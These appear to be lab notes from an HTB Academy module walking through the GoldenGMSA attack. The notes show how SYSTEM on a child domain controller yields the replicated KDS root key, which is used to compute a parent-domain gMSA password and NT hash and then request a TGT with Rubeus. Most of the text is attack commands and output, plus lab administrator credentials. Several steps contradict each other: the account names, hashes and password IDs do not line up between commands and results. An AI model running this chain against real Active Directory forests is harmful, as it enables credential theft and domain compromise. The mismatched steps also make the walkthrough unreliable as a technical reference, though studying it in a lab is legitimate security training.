Intra-forest attacks - GoldenGMSA

1. Lab environment

  • DC02 (child domain controller) - 10.129.229.207 (DHCP) / 172.16.210.3 (dual NIC), dev.inlanefreight.ad
  • DC01 (parent domain controller) - 172.16.210.99, inlanefreight.ad
  • DC02 credentials: Administrator / HTB_@cademy_adm!

2. Introduction

Service accounts rarely have their passwords changed, which makes them easy targets for Kerberoasting. A gMSA hands password management to Windows, which rotates the password on a schedule, and so mitigates Kerberoasting to a degree.

gMSA passwords are handled by Active Directory (AD) and rotated automatically every 30 days. Each new password is randomly generated, 256 bytes long, and effectively infeasible to crack. The password is derived by combining a periodically changing key with certain attributes of the gMSA; that key is stored in the KDS root key object.

The managed password is stored in the gMSA's msDS-ManagedPassword attribute and can only be read by principals listed in PrincipalsAllowedToRetrieveManagedPassword. This right is normally granted to the server that runs the service.

2.1. Creating a gMSA account

PS C:\Users\Administrator> New-ADServiceAccount -Name "apache-dev" -DNSHostName "inlanefreight.ad" -PrincipalsAllowedToRetrieveManagedPassword htb-student-1 -Enabled $True

  • -Name: the name of the gMSA to create
  • -PrincipalsAllowedToRetrieveManagedPassword: the principals allowed to retrieve this gMSA's password

When enumerating with BloodHound we may find that some object has the ReadGMSAPassword edge, meaning it can read the gMSA's password. Common tools such as gMSADumper.py or nxc can retrieve it. Note, however, that these attacks only retrieve gMSA passwords within the current domain; they do not work across the forest.

3. Cross-domain GoldenGMSA attack (child domain -> parent domain)

If we find a gMSA account in the parent domain and want to compromise it from the child domain, across the trust boundary, the GoldenGMSA tool can be used to attack across the trust and obtain the password of a gMSA that exists in the parent domain.

3.1. Prerequisites

To perform the GoldenGMSA attack with the GoldenGMSA tool, the attacker needs access to the following attributes of the KDS root key in the forest root (parent) domain:

  • cn
  • msKds-SecretAgreementParam
  • msKds-RootKeyData
  • msKds-KDFParam
  • msKds-KDFAlgorithmID
  • msKds-CreateTime
  • msKds-UseStartTime
  • msKds-Version
  • msKds-DomainID
  • msKds-PrivateKeyLength
  • msKds-PublicKeyLength
  • msKds-SecretAgreementAlgorithmID

This information is obtained by reading the attributes of the msKds-ProvRootKey object under CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,CN=Configuration,DC=inlanefreight,DC=ad in the forest root (parent) domain.

To access the root domain and read these KDS root key attributes, one of the following is required:

  • Membership in the Enterprise Admins group of the forest root domain
  • Membership in the Domain Admins group of the forest root domain
  • NT AUTHORITY\SYSTEM access on a domain controller
  • A principal that has been granted access to the KDS key attributes in the forest root domain

Because the object lives in the Configuration naming context, which is replicated to every other domain controller in the forest, it is also present on the child domain controller. So once we hold SYSTEM in the child domain, we can query the child DC's local replica and obtain everything needed for the GoldenGMSA attack.

Back on the child domain controller, the DACL prevents us from reading the same attributes from the local replica even as the Administrator user.

The DACL does, however, allow NT AUTHORITY\SYSTEM on the child domain controller to access these attributes.

3.2. GoldenGMSA Tool

GoldenGMSA offers two attack modes, offline and online. Both use the GoldenGMSA tool, and both first require SYSTEM in the child domain.

3.2.1. Online attack:

  • Query the parent domain inlanefreight.ad for the gMSA account's SID
  • Using that SID, compute the gMSA account's password by querying both domains

3.2.2. Offline attack:

  • Query the parent domain inlanefreight.ad for the gMSA account's SID and msds-ManagedPasswordID
  • Query the child domain dev.inlanefreight.ad as SYSTEM for the kdsinfo
  • Using the retrieved attributes, compute the password of the gMSA account in the parent domain by feeding the KDS key and the gMSA info into the GoldenGMSA tool manually

3.3. Online attack

3.3.1. Obtaining SYSTEM

.\PsExec -s -i powershell

3.3.2. Enumerating gMSAs in the parent domain

PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe gmsainfo --domain inlanefreight.ad

sAMAccountName:         svc_devadm$
objectSid:                      S-1-5-21-2879935145-656083549-3766571964-1106
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAagEAAAgAAAAPAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA
----------------------------------------------

sAMAccountName:         gmsa_adm$
objectSid:                      S-1-5-21-2879935145-656083549-3766571964-3103
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAawEAAAEAAAAMAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA
----------------------------------------------

3.3.3. Retrieving the gMSA password

Once we have the SID, the following command retrieves the gMSA password:

PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe compute --sid "S-1-5-21-2879935145-656083549-3766571964-1106" --forest dev.inlanefreight.ad --domain inlanefreight.ad

Base64 Encoded Password:        0FooMwK6aTemEHkXp6IzxqOx2+bFyFq2tsoGtSVinsCuc2diQuzx9ppetPQqwEzTW4XMKqivF+hTey8eDGYnJXmWGbV9rPrQZkpuLpwmm5EfT+O9uIMrtnVIo1mrirDj6+nUjzv6026KsyCaXTOuzQjhatwWxif/Fq/YyuvqibmWYZ/XwxN9wj+f44r8uggzXK+9EtMNlR5j3U3tgaxo8JXw5BsAitFgUOKBghHGXB1wJ3NJ2PQwyxnT1or6N7IyANwYT/RJnlBqXJaeDV7LJq5wPNtOIOWpFAm+kbmuEY2xsiLHWngzFVXf08iTMifGHR2lX0zVeWtN16yu9X6TJw==

  • --forest: the child domain
  • --domain: the parent domain

3.4. Offline attack

3.4.1. Enumerating gMSAs

First, enumerate the SID and msds-ManagedPasswordID associated with the target gMSA.

PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe gmsainfo --domain inlanefreight.ad

sAMAccountName:         svc_devadm$
objectSid:                      S-1-5-21-2879935145-656083549-3766571964-1106
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAagEAAAgAAAAPAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA
----------------------------------------------

sAMAccountName:         gmsa_adm$
objectSid:                      S-1-5-21-2879935145-656083549-3766571964-3103
rootKeyGuid:            ba932c0c-5c34-ce6e-fcb8-d441d116a736
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAawEAAAEAAAAMAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA
----------------------------------------------
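As an added example (not part of the original notes and not code from the GoldenGMSA project), the following Python decodes the msds-ManagedPasswordID values printed above. The layout it parses (version, "KDSK" magic, a flags dword, the L0/L1/L2 key indices, the root key GUID, then UTF-16LE domain and forest names) is what the two blobs on this page contain; the name `flags` for the third dword is my own label. A defender can use the same parse to confirm which KDS root key a gMSA depends on, which should match the Guid that kdsinfo reports and the msKds-ProvRootKey object in the Configuration NC.

```python
import base64
import struct
import uuid
from dataclasses import dataclass

# Fixed-size header of msds-ManagedPasswordID (little-endian), as observed on this page:
# version, "KDSK" magic, flags, L0/L1/L2 key indices, root key GUID,
# an unused dword, then the byte lengths of the UTF-16LE domain and forest names.
_HEADER = struct.Struct("<I4sIIII16sIII")
_MAGIC = b"KDSK"


@dataclass
class ManagedPasswordId:
    version: int
    flags: int
    l0: int            # roughly yearly key generation
    l1: int            # 0..31 within L0
    l2: int            # 0..31 within L1
    root_key_guid: str  # mixed-endian text form, as AD tools print it
    domain: str
    forest: str


def parse_managed_password_id(b64: str) -> ManagedPasswordId:
    """Decode a base64 msds-ManagedPasswordID value into its fields."""
    blob = base64.b64decode(b64)
    if len(blob) < _HEADER.size:
        raise ValueError("blob shorter than the fixed header")
    (version, magic, flags, l0, l1, l2, guid_le,
     _unused, cb_domain, cb_forest) = _HEADER.unpack_from(blob, 0)
    if magic != _MAGIC:
        raise ValueError(f"unexpected magic {magic!r}, not a KDSK structure")
    off = _HEADER.size
    if len(blob) < off + cb_domain + cb_forest:
        raise ValueError("blob truncated before the end of the name fields")
    domain = blob[off:off + cb_domain].decode("utf-16-le").rstrip("\x00")
    forest = blob[off + cb_domain:off + cb_domain + cb_forest].decode("utf-16-le").rstrip("\x00")
    return ManagedPasswordId(version, flags, l0, l1, l2,
                             str(uuid.UUID(bytes_le=guid_le)), domain, forest)


def uses_root_key(b64: str, expected_guid: str) -> bool:
    """True if this gMSA's password is derived from the KDS root key with the given GUID."""
    return parse_managed_password_id(b64).root_key_guid == expected_guid.lower()


# Values copied from the gmsainfo output above (svc_devadm$ and gmsa_adm$).
SVC_DEVADM_PWDID = "AQAAAEtEU0sCAAAAagEAAAgAAAAPAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA"
GMSA_ADM_PWDID = "AQAAAEtEU0sCAAAAawEAAAEAAAAMAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA"

if __name__ == "__main__":
    for name, value in (("svc_devadm$", SVC_DEVADM_PWDID), ("gmsa_adm$", GMSA_ADM_PWDID)):
        print(name, parse_managed_password_id(value))
```

Both accounts resolve to the same root key GUID as the rootKeyGuid lines above but carry different L0/L1/L2 indices, which is why their passwords differ even though they share a KDS root key.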

3.4.2. Enumerating kdsinfo

Use the kdsinfo argument to retrieve the Key Distribution Service (KDS) key associated with the gMSA, which is needed to compute the gMSA password.

PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe kdsinfo --forest dev.inlanefreight.ad

Guid:           ba932c0c-5c34-ce6e-fcb8-d441d116a736
Base64 blob:    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
----------------------------------------------

3.4.3. Computing the gMSA password

Specify the target gMSA's SID, the KDS key and the msds-ManagedPasswordID to compute the gMSA password manually.

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\GoldenGMSA.exe compute --sid "S-1-5-21-2879935145-656083549-3766571964-1106" --kdskey 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 --pwdid AQAAAEtEU0sCAAAAaQEAABEAAAAfAAAADCyTujRcbs78uNRB0RanNgAAAAAiAAAAIgAAAEkATgBMAEEATgBFAEYAUgBFAEkARwBIAFQALgBBAEQAAABJAE4ATABBAE4ARQBGAFIARQBJAEcASABUAC4AQQBEAAAA

Base64 Encoded Password:        tPUI4I55GejjKpdXuVs6qleQvZAfttXyO7kd8tStSEDQscsZdQAHQhw4RynTsBZSA9dMzq96tz8WDH94g5Eq/Y3a5MzX/Bb3JVCYzUCB37x6bj40ygOC5/nJ4EQjbi5RanLbN+hVhgZ9PIrYmUq7G46TXkifsMoGSGBWTw53XE6z8qsm9mMF7SzqY/v0NdWrteXNtrBkNuRjpzpYJwJjZWvnVZy3Np1fEkaTJLR9Gomiw4ddUKSJDWsXaGOu3EVBdM8SgmVTJANzEM4Bet6ldt8O6oNJLUV44UMIgyRmLwcPhvW/8n9ndH8rvAWwN5YYcDd+0bHTFT9c7tlumD/mvA==

3.5. Converting the password to an NT hash

Group Managed Service Account passwords are encrypted by default, which prevents direct retrieval of the plaintext and supports automated management in Active Directory. This encryption helps with compliance, reduces the risk of unauthorised access, and is in line with the principle of least privilege.

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# echo -n 'tPUI4I55GejjKpdXuVs6qleQvZAfttXyO7kd8tStSEDQscsZdQAHQhw4RynTsBZSA9dMzq96tz8WDH94g5Eq/Y3a5MzX/Bb3JVCYzUCB37x6bj40ygOC5/nJ4EQjbi5RanLbN+hVhgZ9PIrYmUq7G46TXkifsMoGSGBWTw53XE6z8qsm9mMF7SzqY/v0NdWrteXNtrBkNuRjpzpYJwJjZWvnVZy3Np1fEkaTJLR9Gomiw4ddUKSJDWsXaGOu3EVBdM8SgmVTJANzEM4Bet6ldt8O6oNJLUV44UMIgyRmLwcPhvW/8n9ndH8rvAWwN5YYcDd+0bHTFT9c7tlumD/mvA==' |base64 -d
y*W[:W;H@бuB8G)ӰRLίz?
khcEAteS$szޥvI-Ex$f/gt+7p7~ѱ?\n? 

As we can see, the decoded output is unreadable binary rather than a printable password.

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# python3 -c "import hashlib, base64; base64_input = 'tPUI4I55GejjKpdXuVs6qleQvZAfttXyO7kd8tStSEDQscsZdQAHQhw4RynTsBZSA9dMzq96tz8WDH94g5Eq/Y3a5MzX/Bb3JVCYzUCB37x6bj40ygOC5/nJ4EQjbi5RanLbN+hVhgZ9PIrYmUq7G46TXkifsMoGSGBWTw53XE6z8qsm9mMF7SzqY/v0NdWrteXNtrBkNuRjpzpYJwJjZWvnVZy3Np1fEkaTJLR9Gomiw4ddUKSJDWsXaGOu3EVBdM8SgmVTJANzEM4Bet6ldt8O6oNJLUV44UMIgyRmLwcPhvW/8n9ndH8rvAWwN5YYcDd+0bHTFT9c7tlumD/mvA=='; print(hashlib.new('md4', base64.b64decode(base64_input)).hexdigest())"
e98bb5b622728ab7abcd38037aa17e56

Whether MD4 is available in hashlib depends on the OpenSSL version Python is built against on a given platform. OpenSSL 3 marks MD4 as a legacy algorithm and disables it by default, so running this snippet on a system with OpenSSL 3.x fails with an unsupported hash type error. Enabling the legacy provider resolves this.

The NT hash can also be computed with Python's pycryptodome library.

┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# python3 -c "from Crypto.Hash import MD4; import base64; base64_input = '0FooMwK6aTemEHkXp6IzxqOx2+bFyFq2tsoGtSVinsCuc2diQuzx9ppetPQqwEzTW4XMKqivF+hTey8eDGYnJXmWGbV9rPrQZkpuLpwmm5EfT+O9uIMrtnVIo1mrirDj6+nUjzv6026KsyCaXTOuzQjhatwWxif/Fq/YyuvqibmWYZ/XwxN9wj+f44r8uggzXK+9EtMNlR5j3U3tgaxo8JXw5BsAitFgUOKBghHGXB1wJ3NJ2PQwyxnT1or6N7IyANwYT/RJnlBqXJaeDV7LJq5wPNtOIOWpFAm+kbmuEY2xsiLHWngzFVXf08iTMifGHR2lX0zVeWtN16yu9X6TJw=='; print(MD4.new(base64.b64decode(base64_input)).hexdigest())"
9ddf2e33e3f3662223bdf1dcaf03feb3

3.5.1. Requesting a TGT

PS C:\Tools> .\Rubeus.exe asktgt /user:gmsa_adm$ /rc4:9ddf2e33e3f3662223bdf1dcaf03feb3 /domain:inlanefreight.ad /ptt
______        _
(_____ \      | |
_____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v2.2.3

[*] Action: Ask TGT
[*] Using rc4_hmac hash: 32ac66cd327aa76b3f1ca6eb82a801c5
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.ad\svc_devadm$'
[*] Using domain controller: 172.16.210.99:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFuDCCBbSgAwIBBaEDAgEWooIEvjCCBLphggS2MIIEsqADAgEFoRIbEElOTEFORUZSRUlHSFQuQUSi
JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGlubGFuZWZyZWlnaHQuYWSjggRuMIIEaqADAgESoQMCAQKiggRc
BIIEWDev0eL5IFlaTJ6Sb3rmcogJF40bFuZdfK5sV9yDz7CdXhaxoM2gXfFgP6ZEBvgwwyXPIU57kmeC
7SKekpr0Dt4ffuO/hfHTHqPIEc4GRx7KWRKBMSr4/yeb3AGePPVv4+PCmbJTRL8wiAX0EAUrKpqqAQ9V
aJCk+xcY+7FZ5PCKMZyqFUgVYP+jXlcV/2crx3aXIo/o9sOxGh1lsXcTfHtcUXTK0MvfBbQc2/gcX41N
<SNIP>

[+] Ticket successfully imported!
ServiceName              :  krbtgt/inlanefreight.ad
ServiceRealm             :  INLANEFREIGHT.AD
UserName                 :  svc_devadm$
UserRealm                :  INLANEFREIGHT.AD
StartTime                :  3/14/2024 4:11:39 PM
EndTime                  :  3/15/2024 2:11:39 AM
RenewTill                :  3/21/2024 4:11:39 PM
Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType                  :  rc4_hmac
Base64(key)              :  sbpg5+PlJWhXObRc4kqmRA==
ASREP (key)              :  32AC66CD327AA76B3F1CA6EB82A801C5